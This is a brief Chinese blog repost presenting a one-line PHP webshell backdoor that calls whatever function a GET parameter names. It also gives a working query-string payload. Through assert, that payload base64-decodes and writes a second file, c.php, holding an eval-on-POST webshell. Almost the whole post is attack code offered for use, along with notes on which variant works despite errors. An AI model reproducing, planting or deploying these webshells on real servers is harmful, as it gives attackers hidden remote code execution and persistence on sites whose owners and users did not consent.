首页 > 其他分享 >一句木马的另一种形式

一句木马的另一种形式

时间:2023-01-05 15:25:16浏览次数:34  
标签:decode% 一句 形式 29 assert 报错 木马

超级隐蔽的PHP后门:
<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用

标签:decode%,一句,形式,29,assert,报错,木马
From: https://www.cnblogs.com/xiaozhangrq/p/17027651.html

相关文章